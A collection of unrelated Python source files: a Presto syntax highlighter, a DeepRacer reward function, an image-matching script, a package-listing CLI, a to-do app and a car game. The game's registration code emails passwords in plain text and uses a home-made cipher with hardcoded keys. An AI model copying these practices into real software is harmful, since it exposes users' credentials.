'day', 'day_of_month', 'day_of_week', 'day_of_year', 'degrees',
'dense_rank', 'dow', 'doy', 'e', 'element_at', 'empty_approx_set',
'evaluate_classifier_predictions', 'every', 'exp', 'features',
'filter', 'first_value', 'flatten', 'floor', 'great_circle_distance',
'greatest', 'hamming_distance', 'hash_counts', 'histogram', 'hmac_md5',
'hmac_sha1', 'hmac_sha256', 'hmac_sha512', 'hour', 'index', 'infinity',
'intersection_cardinality', 'inverse_beta_cdf', 'inverse_normal_cdf',
'is_finite', 'is_infinite', 'is_json_scalar', 'is_nan',
'jaccard_index', 'json_array_contains', 'json_array_get',
'json_array_length', 'json_extract', 'json_extract_scalar',
'json_format', 'json_parse', 'json_size', 'kurtosis', 'lag',
'last_value', 'lead', 'learn_classifier', 'learn_libsvm_classifier',
'learn_libsvm_regressor', 'learn_regressor', 'least', 'length',
'levenshtein_distance', 'like_pattern', 'line_locate_point', 'ln',
'localtime', 'localtimestamp', 'log10', 'log2', 'lower', 'lpad',
'ltrim', 'make_set_digest', 'map', 'map_agg', 'map_concat',
'map_entries', 'map_filter', 'map_from_entries', 'map_keys',
'map_union', 'map_values', 'map_zip_with', 'max', 'max_by', 'md5',
'merge', 'merge_set_digest', 'millisecond', 'min', 'min_by', 'minute',
'mod', 'nullif', 'parse_presto_data_size', 'qdigest_agg', 'quarter',
'radians', 'rand', 'random', 'rank', 'reduce', 'reduce_agg',
'regexp_extract', 'regexp_extract_all', 'regexp_like',
'regexp_replace', 'regexp_split', 'regr_intercept', 'regr_slope',
'regress', 'render', 'repeat', 'replace', 'reverse', 'rgb', 'round',
'row_number', 'rpad', 'rtrim', 'second', 'sequence', 'sha1', 'sha256',
'sha512', 'shuffle', 'sign', 'simplify_geometry', 'sin', 'skewness',
'slice', 'spatial_partitioning', 'spatial_partitions', 'split',
'split_part', 'split_to_map', 'split_to_multimap', 'spooky_hash_v2_32',
'spooky_hash_v2_64', 'sqrt', 'ST_Area', 'ST_AsBinary', 'ST_AsText',
'ST_Boundary', 'ST_Buffer', 'ST_Centroid', 'ST_Contains',
'ST_ConvexHull', 'ST_CoordDim', 'ST_Crosses', 'ST_Difference',
'ST_Dimension', 'ST_Disjoint', 'ST_Distance', 'ST_EndPoint',
'ST_Envelope', 'ST_EnvelopeAsPts', 'ST_Equals', 'ST_SymDifference',
'ST_Touches', 'ST_Union', 'ST_Within', 'ST_X', 'ST_XMax', 'ST_XMin',
'ST_Y', 'ST_YMax', 'ST_YMin', 'stddev', 'stddev_pop', 'stddev_samp',
'strpos', 'substr', 'substring', 'sum', 'tan', 'tanh', 'timezone_hour',
'timezone_minute', 'to_base', 'to_base64', 'to_base64url',
'to_big_endian_32', 'to_big_endian_64', 'to_char', 'to_date',
'to_geometry', 'to_hex', 'to_ieee754_32', 'to_ieee754_64',
'to_iso8601', 'to_milliseconds', 'to_spherical_geography',
'to_timestamp', 'to_unixtime', 'to_utf8', 'transform',
'transform_keys', 'transform_values', 'trim', 'truncate', 'try',
'try_cast', 'typeof', 'unnest', 'upper', 'url_decode', 'url_encode',
'url_extract_fragment', 'url_extract_host', 'url_extract_parameter',
'url_extract_path', 'url_extract_port', 'url_extract_protocol',
'url_extract_query', 'uuid', 'value_at_quantile',
'values_at_quantiles', 'var_pop', 'var_samp', 'variance', 'week',
'week_of_year', 'width_bucket', 'wilson_interval_lower',
'wilson_interval_upper', 'word_stem', 'xxhash64', 'year_of_week',
'yearcast', 'yow', 'zip', 'zip_with']
# constants
constants = [
'false', 'null', 'true'
]
# operators
operators = [
'=', '->'
# Comparison
'==', '!=', '<', '<=', '>', '>=',
# Arithmetic
r'\+', '-', r'\*', '/', '//', r'\%', r'\*\*',
# In-place
r'\+=', '-=', r'\*=', '/=', r'\%=',
# Bitwise
r'\^', r'\|', r'\&', r'\~', '>>', '<<',
' and ', ' between ', ' in ', ' is ', ' like ', ' not ', ' or '
]
# braces
braces = [
r'\{', r'\}', r'\(', r'\)', r'\[', r'\]',
]
def __init__(self, document):
QSyntaxHighlighter.__init__(self, document)
# Multi-line strings (expression, flag, style)
# FIXME: The triple-quotes in these two lines will mess up the
# syntax highlighting from this point onward
self.tri_single = (QRegExp("'''"), 1, STYLES['string2'])
self.tri_double = (QRegExp('"""'), 2, STYLES['string2'])
rules = []
# Keyword, function, constant, operator, and brace rules
rules += [(r'\b%s\b' % w, 0, STYLES['keyword'])
for w in PrestoHighlighter.keywords]
rules += [(r'\b%s\b' % f, 0, STYLES['function'])
for f in PrestoHighlighter.functions]
rules += [(r'\b%s\b' % c, 0, STYLES['constant'])
for c in PrestoHighlighter.constants]
rules += [(r'%s' % o, 0, STYLES['operator'])
for o in PrestoHighlighter.operators]
rules += [(r'%s' % b, 0, STYLES['brace'])
for b in PrestoHighlighter.braces]
# All other rules
rules += [
# Double-quoted string, possibly containing escape sequences
(r'"[^"\\]*(\\.[^"\\]*)*"', 0, STYLES['string']),
# Single-quoted string, possibly containing escape sequences
(r"'[^'\\]*(\\.[^'\\]*)*'", 0, STYLES['string']),
# From '--' until a newline
(r'--[^\n]*', 0, STYLES['comment']),
# Numeric literals
(r'\b[+-]?[0-9]+[lL]?\b', 0, STYLES['numbers']),
(r'\b[+-]?0[xX][0-9A-Fa-f]+[lL]?\b', 0, STYLES['numbers']),
(r'\b[+-]?[0-9]+(?:\.[0-9]+)?(?:[eE][+-]?[0-9]+)?\b',
0, STYLES['numbers']),
]
# Build a QRegExp for each pattern
self.rules = [(QRegExp(pat, Qt.CaseInsensitive), index, fmt)
for (pat, index, fmt) in rules]
def highlightBlock(self, text):
"""Apply syntax highlighting to the given block of text.
"""
# Do other syntax formatting
for expression, nth, format in self.rules:
index = expression.indexIn(text, 0)
while index >= 0:
# We actually want the index of the nth match
index = expression.pos(nth)
length = len(expression.cap(nth))
self.setFormat(index, length, format)
index = expression.indexIn(text, index + length)
self.setCurrentBlockState(0)
# Do multi-line strings
in_multiline = self.match_multiline(text, *self.tri_single)
if not in_multiline:
in_multiline = self.match_multiline(text, *self.tri_double)
def match_multiline(self, text, delimiter, in_state, style):
"""Do highlighting of multi-line strings. ``delimiter`` should be a
``QRegExp`` for triple-single-quotes or triple-double-quotes, and
``in_state`` should be a unique integer to represent the corresponding
state changes when inside those strings. Returns True if we're still
inside a multi-line string when this function is finished.
"""
# If inside triple-single quotes, start at 0
if self.previousBlockState() == in_state:
start = 0
add = 0
# Otherwise, look for the delimiter on this line
else:
start = delimiter.indexIn(text)
# Move past this match
add = delimiter.matchedLength()
# As long as there's a delimiter match on this line...
while start >= 0:
# Look for the ending delimiter
end = delimiter.indexIn(text, start + add)
# Ending delimiter on this line?
if end >= add:
length = end - start + add + delimiter.matchedLength()
self.setCurrentBlockState(0)
# No; multi-line string
else:
self.setCurrentBlockState(in_state)
length = text.length() - start + add
# Apply formatting
self.setFormat(start, length, style)
# Look for the next match
start = delimiter.indexIn(text, start + length)
# Return True if still inside a multi-line string, False otherwise
if self.currentBlockState() == in_state:
return True
else:
return False
| 2.640625
| 3
|
function/AWS-DR-Cherry-E.py
|
Iviglious/deep-race-cherry
| 0
|
12777977
|
def reward_function(params):
'''
Cosine reward function for heading angle
'''
# Import libraries
import math
# PARAMETERS (CONSTANTS)
# Total num of steps we want the car to finish the lap, it will vary depends on the track length
TOTAL_NUM_STEPS = 300
# Max angle threshold (degrees). Heading direction of the car in regards to the track (closest waypoints).
COS_THRESHOLD = 0.1213
# Max speed
MAX_SPEED = 12.1
# Max steering angle (degree)
MAX_STEERING = 30.1
# Read input parameters
distance_from_center = params['distance_from_center']
track_width = params['track_width']
steering_abs = abs(params['steering_angle']) # Only need the absolute steering angle (max: 30, min -30)
speed = params['speed']
steps = params['steps']
progress = params['progress']
all_wheels_on_track = params['all_wheels_on_track']
waypoints = params['waypoints']
closest_waypoints = params['closest_waypoints']
heading = params['heading']
# Calculate 3 markers that are at varying distances away from the center line
marker_1 = 0.1 * track_width
marker_2 = 0.25 * track_width
marker_3 = 0.5 * track_width
# Give higher reward if the agent is closer to center line and vice versa
if distance_from_center <= marker_1:
reward = 1
elif distance_from_center <= marker_2:
reward = 0.5
elif distance_from_center <= marker_3:
reward = 0.1
else:
reward = 1e-3 # likely crashed/ close to off track
# Calculate the direction of the center line based on the closest waypoints
next_point = waypoints[closest_waypoints[1]]
prev_point = waypoints[closest_waypoints[0]]
# Calculate the direction in radius, arctan2(dy, dx), the result is (-pi, pi) in radians
track_angle = math.atan2(next_point[1] - prev_point[1], next_point[0] - prev_point[0])
# Convert to degree
track_angle = math.degrees(track_angle)
# Calculate negative cosine
cos_value = math.cos(math.radians(heading + track_angle)) * 3.0 - 2.0 # cos * 3 - 2 (0.1 -> 1)
#print('Track angle: {0}, Heading angle: {1}, Cos: {2}'.format(track_angle, heading, cos_value))
# Penalize the reward if the heading angle is too large
if cos_value < COS_THRESHOLD:
reward *= 0.01
else:
reward *= cos_value
# Give additional reward if the car pass every 100 steps faster than expected
if (steps % 100) == 0 and progress > (steps / TOTAL_NUM_STEPS) * 100 :
reward += progress/100.0
# Penalize if the car goes off track
if not all_wheels_on_track:
reward = 1e-3
return float(reward)
# Test function
print(reward_function({
'distance_from_center': 0
,'track_width': 10
,'steering_angle': 0
,'speed': 1
,'steps': 0
,'progress': 0
,'all_wheels_on_track': True
,'waypoints':[(100,100),(150,100)]
,'closest_waypoints':[0,1]
,'heading': 0
}))
| 3.453125
| 3
|
matching_area/matching_area.py
|
neuroinformatics/bah2015_registration
| 0
|
12777978
|
# -*- coding: utf-8 -*-
import sys
from PIL import Image
from PIL import ImageStat
def matching_ish(labeled_filename, ish_filename, output_filename, slice):
N_AREA = 40
threshold = 10
volume_threshold = 10
volume_bias = 40
labeled_count = {}
labeled_volume = {}
result_value = {}
result_value_max = {}
result_value_per_vol = {}
labeled = Image.open(labeled_filename)
labeled.seek(slice)
labeled_data = labeled.getdata()
ish = Image.open(ish_filename)
ish_data = ish.getdata()
for value in range(N_AREA):
labeled_volume[value] = 0
result_value[value] = 0
result_value_max[value] = 0
result_value_per_vol[value] = 0
# calculate volume of each area
for value in labeled_data:
value = int(value)
labeled_volume[value] += 1
# summation value of each area
for (ish_val, labeled_val) in zip(ish_data, labeled_data):
if(int(labeled_val)!=0 and ish_val):
#value = 256 - (ish_val[0] + ish_val[1] + ish_val[2]) / 3
#value = ish_val[2]*2 - ish_val[0] - ish_val[1];
value = ish_val[2]*2 - (ish_val[0] + ish_val[1]) * 0.9;
if value > threshold:
result_value[int(labeled_val)] += value
if value > result_value_max[int(labeled_val)]:
result_value_max[int(labeled_val)] = value
# normalize value by volume
for i in range(N_AREA):
if labeled_volume[i] > volume_threshold:
result_value_per_vol[i] = float(result_value[i]) / float(labeled_volume[i] + volume_bias)
else:
result_value_per_vol[i] = 0
# write to file
fp = open(output_filename, 'w')
lines = []
#for (k, v) in result_value.items():
for (k, v) in result_value_per_vol.items():
lines.append('%d, %6.1f\n' % (k, v))
fp.writelines(lines)
fp.close()
# show result
i = 1
for k, v in sorted(result_value_per_vol.items(), key=lambda x:x[1], reverse=True):
print 'Rank %3d : Area %3d (normal value = %6.1f, value = %6d, volume = %6d)' % (i, k, v, result_value[k], labeled_volume[k])
i += 1
return result_value
if __name__ == '__main__':
argvs = sys.argv
argc = len(argvs)
labeled_filename = '/mnt/data1/bah2015/reslice_labeled.tif'
if argc >= 2:
ish_filename = argvs[1]
else:
#ish_filename = '/media/nebula/data/bah/CD00050.1-VimRegistered.tif'
ish_filename = '/mnt/data1/bah2015/registration_Affine/CD02689.1-Dtl.tif'
if argc >= 3:
out_filename = argvs[2]
else:
out_filename = './result/CD02689.1-Dtl.txt'
if argc >= 4:
slice = int(argvs[3])
else:
slice = 112
#analysis_tif(labeled_filename, ish_filename, out_filename, slice)
#regen_segfile(labeled_filename)
print ish_filename
matching_ish(labeled_filename, ish_filename, out_filename, slice)
| 2.765625
| 3
|
cilantropy/console.py
|
foozzi/cilantro
| 49
|
12777979
|
"""
.. module:: console
:platform: Unix, Windows
:synopsis: Cilantropy entry-point for console commands
:mod:`console` -- Cilantropy entry-point for console commands
==================================================================
"""
from .helpers import get_shared_data
from .helpers import get_pkg_res
from .helpers import get_pypi_search
from .helpers import get_pypi_releases
from .helpers import parse_dict
from .helpers import get_kv_colored
from .helpers import get_field_formatted
from .helpers import create_paste_template
from . import metadata
from .settings import __version__
from .settings import __author__
from .settings import __author_url__
from .settings import TEKNIK_PASTE_API
from flask import json
from docopt import docopt
import urllib
import urllib.request
from colorama import init
from colorama import Fore
from colorama import Back
from colorama import Style
import pkg_resources
def cmd_show(args, short=False):
"""This function implements the package show command.
:param args: the docopt parsed arguments
"""
proj_name = args["<project_name>"]
try:
pkg_dist = get_pkg_res().get_distribution(proj_name)
except:
print(
Fore.RED + Style.BRIGHT
) + "Error: unable to locate the project '%s' !" % proj_name
raise RuntimeError("Project not found !")
try:
pkg_metadata = pkg_dist.get_metadata(metadata.METADATA_NAME[0])
except FileNotFoundError:
pkg_metadata = pkg_dist.get_metadata(metadata.METADATA_NAME[1])
except FileNotFoundError:
pass
parsed, key_known = metadata.parse_metadata(pkg_metadata)
distinfo = metadata.metadata_to_dict(parsed, key_known)
proj_head = Fore.GREEN + Style.BRIGHT + pkg_dist.project_name
proj_head += Fore.YELLOW + Style.BRIGHT + " " + pkg_dist.version
print(proj_head),
proj_sum = Fore.WHITE + Style.DIM
proj_sum += "- " + parse_dict(distinfo, "summary", True)
print(proj_sum)
# Remove long fields and used fields
if "description" in distinfo:
del distinfo["description"]
if "summary" in distinfo:
del distinfo["summary"]
if "name" in distinfo:
del distinfo["name"]
if "version" in distinfo:
del distinfo["version"]
classifier = None
if "classifier" in distinfo:
classifier = distinfo["classifier"]
del distinfo["classifier"]
for key in distinfo:
print(get_field_formatted(distinfo, key))
if short:
return
print()
print(get_kv_colored("location", pkg_dist.location))
requires = pkg_dist.requires()
if len(requires) == 0:
print(get_kv_colored("requires", "none"))
else:
req_text = "\n"
for req in requires:
req_text += " " * 4 + str(req) + "\n"
print(get_kv_colored("requires", req_text))
entry_points = pkg_dist.get_entry_map()
console_scripts = entry_points.get("console_scripts")
if console_scripts:
console_scr_text = Fore.WHITE + Style.BRIGHT + " Console Scripts:" + "\n"
for name, entry in console_scripts.items():
console_scr_text += (
Fore.YELLOW + Style.BRIGHT + " " * 4 + name + Fore.WHITE + Style.BRIGHT
)
console_scr_text += (
" -> "
+ Fore.GREEN
+ Style.BRIGHT
+ entry.module_name
+ ":"
+ ",".join(entry.attrs)
+ "\n"
)
print(console_scr_text)
if classifier:
distinfo["classifier"] = classifier
print(get_field_formatted(distinfo, "classifier"))
def cmd_list_detail(dist, distinfo):
proj_head = Fore.GREEN + Style.BRIGHT + dist.project_name
proj_head += Fore.YELLOW + Style.BRIGHT + " " + dist.version
print(proj_head)
proj_sum = Fore.WHITE + Style.DIM
proj_sum += "- " + parse_dict(distinfo, "summary", True)
print(proj_sum)
print(get_field_formatted(distinfo, "Author"))
author_email = distinfo.get("author-email")
if author_email:
print("<%s>" % author_email)
else:
print()
print(get_field_formatted(distinfo, "Home-page"))
print(get_field_formatted(distinfo, "License"))
print(get_field_formatted(distinfo, "Platform"))
def cmd_list_compact(dist, distinfo):
proj_head = Fore.GREEN + Style.BRIGHT + dist.project_name.ljust(25)
proj_head += Fore.WHITE + Style.BRIGHT + " " + dist.version.ljust(12)
print(proj_head, end="")
proj_sum = Fore.WHITE + Style.DIM
proj_sum += " " + parse_dict(distinfo, "summary", True)
print(proj_sum.ljust(100))
def cmd_list(args):
"""This function implements the package list command.
:param args: the docopt parsed arguments
"""
compact = args["--compact"]
filt = args["<filter>"]
distributions = get_shared_data()["distributions"]
if compact:
print(
Fore.YELLOW
+ Style.BRIGHT
+ "Project Name".ljust(26)
+ "Version".ljust(14)
+ "Summary"
)
print("-" * 80)
for dist in distributions:
if filt:
if filt.lower() not in dist.project_name.lower():
continue
pkg_dist = get_pkg_res().get_distribution(dist.key)
try:
pkg_metadata = pkg_dist.get_metadata(metadata.METADATA_NAME[0])
except FileNotFoundError:
pkg_metadata = pkg_dist.get_metadata(metadata.METADATA_NAME[1])
except FileNotFoundError:
pass
parsed, key_known = metadata.parse_metadata(pkg_metadata)
distinfo = metadata.metadata_to_dict(parsed, key_known)
if compact:
cmd_list_compact(dist, distinfo)
else:
cmd_list_detail(dist, distinfo)
def cmd_check(args):
proj_name = args["<project_name>"]
cmd_show(args, short=True)
print()
print(Fore.GREEN + Style.BRIGHT + "Searching for updates on PyPI...")
print()
pkg_dist_version = get_pkg_res().get_distribution(proj_name).version
pypi_rel = get_pypi_releases(proj_name)
if pypi_rel:
pypi_last_version = get_pkg_res().parse_version(pypi_rel[0])
current_version = get_pkg_res().parse_version(pkg_dist_version)
try:
version_index = pypi_rel.index(pkg_dist_version)
except:
version_index = len(pypi_rel)
for version in pypi_rel[0 : version_index + 3]:
print(Fore.WHITE + Style.BRIGHT + " Version %s" % version, end=" ")
if version == pypi_rel[0]:
print(Fore.BLUE + Style.BRIGHT + "[last version]", end=" ")
if version == pkg_dist_version:
print(Fore.GREEN + Style.BRIGHT + "[your version]", end="")
print()
print()
if pypi_last_version > current_version:
print(
Fore.RED
+ Style.BRIGHT
+ " Your version is outdated, you're using "
+ Fore.WHITE
+ Style.BRIGHT
+ "v.%s," % pkg_dist_version
+ Fore.RED
+ Style.BRIGHT
+ " but the last version is "
+ Fore.WHITE
+ Style.BRIGHT
+ "v.%s !" % pypi_rel[0]
)
if pypi_last_version == current_version:
print(Fore.GREEN + Style.BRIGHT + " Your version is updated !")
if pypi_last_version < current_version:
print(
Fore.YELLOW
+ Style.BRIGHT
+ " Your version newer than the version available at PyPI !"
)
print(
Fore.YELLOW
+ Style.BRIGHT
+ " You're using "
+ Fore.WHITE
+ Style.BRIGHT
+ "v.%s," % pkg_dist_version
+ Fore.YELLOW
+ Style.BRIGHT
+ " but the last version in PyPI "
+ Fore.WHITE
+ Style.BRIGHT
+ "v.%s !" % pypi_rel[0]
)
else:
print("No versions found on PyPI !")
def cmd_scripts(args):
filt = args["<filter>"]
print(
Fore.YELLOW
+ Style.BRIGHT
+ "Script Name".ljust(23)
+ "Project Name".ljust(21)
+ "Module Name"
)
print("-" * 80)
for entry in pkg_resources.iter_entry_points("console_scripts"):
if filt:
if filt.lower() not in entry.name.lower():
continue
print(Fore.GREEN + Style.BRIGHT + entry.name.ljust(22), end="")
print(Fore.WHITE + Style.NORMAL + str(entry.dist).ljust(20), end="")
print(Fore.BLUE + Style.BRIGHT + entry.module_name, end="")
print(Fore.BLUE + Style.NORMAL + "(" + entry.attrs[0] + ")", end="\n")
def cmd_paste(args):
template_data = create_paste_template()
data = urllib.parse.urlencode({"code": template_data})
res = urllib.request.urlopen(TEKNIK_PASTE_API, bytes(data, encoding="utf-8"))
result = json.loads(res.read().decode("utf-8"))
if "result" in result:
print(
Fore.GREEN + Style.BRIGHT + "Paste url: {}".format(result["result"]["url"])
)
else:
print(Fore.RED + Style.BRIGHT + "ERROR PASTE!")
def run_main():
"""Cilantropy - Python List Packages (PLP)
Usage:
plp list [--compact] [<filter>]
plp show <project_name>
plp check <project_name>
plp scripts [<filter>]
plp paste [list your packages to pastebin service]
plp (-h | --help)
plp --version
Options:
--compact Compact list format
-h --help Show this screen.
--version Show version.
"""
init(autoreset=True)
arguments = docopt(
run_main.__doc__,
version="Cilantropy v.%s - Python List Packages (PLP)" % __version__,
)
if arguments["list"]:
cmd_list(arguments)
if arguments["show"]:
cmd_show(arguments)
if arguments["check"]:
cmd_check(arguments)
if arguments["scripts"]:
cmd_scripts(arguments)
if arguments["paste"]:
cmd_paste(arguments)
if __name__ == "__main__":
run_main()
| 2.21875
| 2
|
todo.py
|
puntogris/recordatorios
| 0
|
12777980
|
#programa de recordatorios
import pickle
import os
#crea lista vacia en un archivo llamada outfile con pickle si no exite uno
#de lo contrario abre el creado previamente
if os.path.isfile('./outfile') == False:
recordatorios = []
with open('outfile', 'wb') as fp:
pickle.dump(recordatorios, fp)
else:
with open ('outfile', 'rb') as fp:
recordatorios = pickle.load(fp)
#opciones para elejir
print('Opciones:')
print('\
1 - Ver recordatorios\n\
2 - Agregar items\n\
3 - Quitar items\n\
4 - Salir\
')
#muestra la lista en forma vertical y numera los items
def mostrar_items(lista):
print("Recordatorios:")
for lugar,line in enumerate(lista):
print(" ",lugar + 1,'-' , line)
#funcion main con codigo de las oredenes
def main():
ordenes = int(input('Que queres hacer?... '))
if ordenes == 1:
if recordatorios == []:
print("No tenes recordatorios.")
main()
else:
mostrar_items(recordatorios)
main()
elif ordenes == 2:
agregar_recordar = input('Ingresa de lo que queres que te recuerde... ')
recordatorios.append(agregar_recordar.capitalize())
mostrar_items(recordatorios)
main()
elif ordenes == 3:
mostrar_items(recordatorios)
item = int(input('Ingresa el numero de item a eliminar: '))
del recordatorios[item - 1]
mostrar_items(recordatorios)
main()
elif ordenes == 4:
with open('outfile', 'wb') as fp:
pickle.dump(recordatorios, fp)
quit('Adios!')
else:
print('Error, intenta de nuevo.')
main()
main()
| 3.75
| 4
|
car.py
|
git4robot/CarGame
| 0
|
12777981
|
from tkinter import *
from tkinter import messagebox, colorchooser
from logging import basicConfig, warning, info, error, DEBUG
from os import getcwd, path, mkdir
from time import strftime, time, localtime
from json import dump, load
from re import findall, search
from hmac import new, compare_digest
from hashlib import sha224, sha512
from secrets import choice
from string import ascii_letters
from requests import get
from smtplib import SMTP, SMTPRecipientsRefused
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
class Vigenere:
def __init__(self):
self.letter_list = 'A B C D E F G H I J K L M N O P Q R S T U V W X Y Z'.split(' ')
self.number_list = list(range(26))
def encipher(self, msg, secret_key):
self.pattern_list = findall(r'[\s]|[0123456789]|[~`!@#\$%\^&\*()_\+\-={}|\[\]\\:";\'\<\>\?,./", ]', msg)
msg = msg.upper()
for x in self.pattern_list:
msg = msg.replace(x, '')
self.secret_key = secret_key.upper()
while True:
if len(self.secret_key) < len(msg):
self.secret_key *= 2
else:
self.secret_key = self.secret_key[:len(msg)].upper()
break
self.encipher_text_list1 = [x for x in list(msg)]
self.encipher_text_list2 = [x for x in list(self.secret_key)]
self.encipher_text_list = []
for x in range(len(msg)):
self.encipher_text_list += [[self.encipher_text_list1[x], self.encipher_text_list2[x]]]
self.output_list = []
for x in range(len(msg)):
self.num_msg = self.number_list[self.letter_list.index(self.encipher_text_list[x][0])]
self.num_key = self.number_list[self.letter_list.index(self.encipher_text_list[x][1])]
self.new_letter_list = self.letter_list[self.number_list[self.num_msg]:] + list(self.letter_list[0:self.number_list[self.num_msg]])
self.output_list += self.new_letter_list[self.num_key]
self.output = ''
for x in self.output_list:
self.output += x
return self.output
def decipher(self, msg, secret_key):
self.pattern_list = findall(r'[\s]|[0123456789]|[~`!@#\$%\^&\*()_\+\-={}|\[\]\\:";\'\<\>\?,./", ]', msg)
msg = msg.upper()
for x in self.pattern_list:
msg = msg.replace(x, '')
self.secret_key = secret_key.upper()
while True:
if len(self.secret_key) < len(msg):
self.secret_key *= 2
else:
self.secret_key = self.secret_key[:len(msg)].upper()
break
self.decipher_text_list1 = [x for x in list(msg)]
self.decipher_text_list2 = [x for x in list(self.secret_key)]
self.decipher_text_list = []
for x in range(len(msg)):
self.decipher_text_list += [[self.decipher_text_list1[x], self.decipher_text_list2[x]]]
self.output_list = []
self.msg_list = list(msg)
for x in range(len(msg)):
self.num_msg = self.number_list[self.letter_list.index(self.decipher_text_list[x][0])]
self.num_key = self.number_list[self.letter_list.index(self.decipher_text_list[x][1])]
self.new_letter_list = self.letter_list[self.number_list[self.num_key]:] + list(self.letter_list[0:self.number_list[self.num_key]])
self.output_list += self.letter_list[self.new_letter_list.index(self.msg_list[x])]
self.output = ''
for x in self.output_list:
self.output += x
return self.output
class GUI():
def __init__(self):
CreateLogFile()
try:
self.newcolor = Config('color.json').loadfile()
except FileNotFoundError:
self.newcolor = None
Config('color.json').createfile(self.newcolor)
self.root = Tk()
self.root.title('Car Game')
self.root.resizable(0, 0)
try:
open('.\\.image\\car.ico')
self.root.iconbitmap('.\\.image\\car.ico')
except FileNotFoundError:
CreateFolder('.image')
with open('.\\.image\\car.ico', 'wb') as code:
code.write(get('https://www.easyicon.net/download/ico/1284184/128/').content)
self.rstr = StringVar()
self.rint = IntVar()
self.screenwidth = self.root.winfo_screenwidth()
self.screenheight = self.root.winfo_screenheight()
alignstr = f'750x600+{(self.screenwidth - 750) // 2}+{(self.screenheight - 600) // 2 - 50}'
self.root.geometry(alignstr)
self.lable = Label(self.root, height = 600, width = 750, bd = 0, \
bg = self.newcolor, highlightthickness = 0)
self.lable.pack()
self.check_account = Label(self.root, height = 200, width = 200, bd = 0, \
bg = self.newcolor, highlightthickness = 0, text = 'l').pack(anchor = 'nw')
#self.check_account.pack(anchor = 'nw')
self.menu = Menu(self.root, bd = 0, tearoff = False)
self.file = Menu(self.menu, tearoff = False)
self.menu.add_cascade(label = 'File', menu = self.file)
self.file.add_command(label = 'Edit Color', command = self.color)
self.file.add_separator()
self.file.add_command(label = 'Exit', command = self.rquit)
self.rmenu = Menu(self.root, tearoff = False)
self.rmenu.add_command(label = 'Exit', command = self.rquit)
self.lable.bind('<Button-3>', self.popup)
self.createcar = Menu(self.menu, tearoff = False)
self.menu.add_cascade(label = 'Cars', menu = self.createcar)
self.createcar.add_command(label = 'Create New Car', \
command = self.create_car_gui)
self.account = Menu(self.menu, tearoff = False)
self.menu.add_cascade(label = 'Account Manage', menu = self.account)
self.account.add_command(label = 'Login', command = self.login)
self.account.add_command(label = 'Register', command = self.register)
self.root.config(menu = self.menu)
self.root.mainloop()
def register(self):
self.registertop = Toplevel(bg = self.newcolor)
self.registertop.title('Register')
self.registertop.resizable(0, 0)
alignstr = f'250x200+{(self.screenwidth - 750) // 2}+{(self.screenheight - 600) // 2 - 50}'
self.registertop.geometry(alignstr)
self.registertop.iconbitmap('.\\.image\\car.ico')
label1 = Label(self.registertop, text = 'User Name', \
bg = self.newcolor).place(relx = .025, rely = .03)
self.username = Entry(self.registertop, bg = self.newcolor)
self.username.place(relx = .45, rely = .04)
label2 = Label(self.registertop, text = 'Email', \
bg = self.newcolor).place(relx = .025, rely = .14)
self.emailname = Entry(self.registertop, bg = self.newcolor)
self.emailname.place(relx = .45, rely = .15)
label3 = Label(self.registertop, text = 'Password', \
bg = self.newcolor).place(relx = .025, rely = .25)
self.password = Entry(self.registertop, bg = self.newcolor, show = '*')
self.password.place(relx = .45, rely = .26)
label4 = Label(self.registertop, text = 'Confirm Password', \
bg = self.newcolor).place(relx = .025, rely = .36)
self.conpassword = Entry(self.registertop, bg = self.newcolor, show = '*')
self.conpassword.place(relx = .45, rely = .37)
button = Button(self.registertop, text = 'Create Account', \
command = self.registervalid, \
bg = self.newcolor).place(relx = .5, rely = .8, \
anchor = 'center')
def registervalid(self):
self.user = self.username.get()
self.em = self.emailname.get()
self.word = self.password.get()
self.cword = self.conpassword.get()
self.valid1 = self.valid2 = self.valid3 = self.valid4 = self.valid5 = True
if not self.user.split():
warninput = messagebox.showwarning('Warning', 'No input of username')
warning('No input of username.')
self.valid1 = False
if path.isfile(getcwd() + f'\\.account\\{self.user}.json'):
infoinput = messagebox.showinfo('Info', f'Username \'{self.user}\' has already exists')
warning(f'Username \'{self.user}\' has already exists.')
self.valid1 = False
if not self.em.split():
warninput = messagebox.showwarning('Warning', 'No input of email')
warning('No input of email.')
self.valid2 = False
if not self.word.split():
warninput = messagebox.showwarning('Warning', 'No input of password')
warning('No input of password.')
self.valid3 = False
if self.word != self.cword:
errorinput = messagebox.showerror('Error', 'Passwords are not the same')
error('Passwords are not the same.')
self.valid4 = False
if not self.valid1 or not self.valid2 or not self.valid3 or not self.valid4:
self.register()
else:
self.send_email()
def send_email(self):
msg = MIMEMultipart()
msg.attach(MIMEText(f'Dear {self.user}: \n\tYour Password is {self.word}.', 'plain', 'utf-8'))
sender = '<EMAIL>'
password = '<PASSWORD>'
receiver = self.em
receiver = '<EMAIL>' #HU<PASSWORD>
msg['From'] = sender
msg['To'] = receiver
msg['Subject'] = 'Confirm Password'
with open(getcwd() + '\\.config\\color.json', 'rb') as send_file:
att = MIMEText(send_file.read(), 'base64', 'utf-8')
att['Content-Type'] = 'application/octet-stream'
att['Content-Disposition'] = 'attachment;filename="color.json"'
msg.attach(att)
smtp_server = 'smtp.yeah.net'
server = SMTP(smtp_server, 25)
server.ehlo()
server.starttls()
server.login(sender, password)
server.set_debuglevel(False)
try:
server.sendmail(sender, receiver, msg.as_string())
except SMTPRecipientsRefused:
self.valid5 = False
msg['To'] = '<EMAIL>'
server.sendmail(sender, '<EMAIL>', msg.as_string())
server.quit()
if self.valid5:
messagebox.showinfo('Successful', f'Successfuly create account {self.user}')
info(f'Successfuly create account \'{self.user}\'.')
self.encrypt_register(self.word)
else:
messagebox.showerror('Error', f'Email \'{self.em}\' is uncorrect')
error(f'Email \'{self.em}\' is uncorrect.')
self.register()
def encrypt_register(self, password):
encrypted_password = Vigenere().encipher(password, '<PASSWORD>')
onepass = sha512(b'2<PASSWORD>asdfwerxdf34sdfsdfs90')
onepass.update(encrypted_password.encode())
import hashlib
self.signp = b'GQnIdFUUAUDlcepuaDVGJpnmfRektPLT'
sign = new(signp, onepass.hexdigest().encode('utf-8'), \
digestmod = sha224).hexdigest()
Account(f'{self.user}.json').createfile([onepass.hexdigest(), 'fdfskfg', sign])
def login(self):
self.logintop = Toplevel(bg = self.newcolor)
self.logintop.title('Login')
self.logintop.resizable(0, 0)
alignstr = f'250x75+{(self.screenwidth - 750) // 2}+{(self.screenheight - 600) // 2 - 50}'
self.logintop.geometry(alignstr)
self.logintop.iconbitmap('.\\.image\\car.ico')
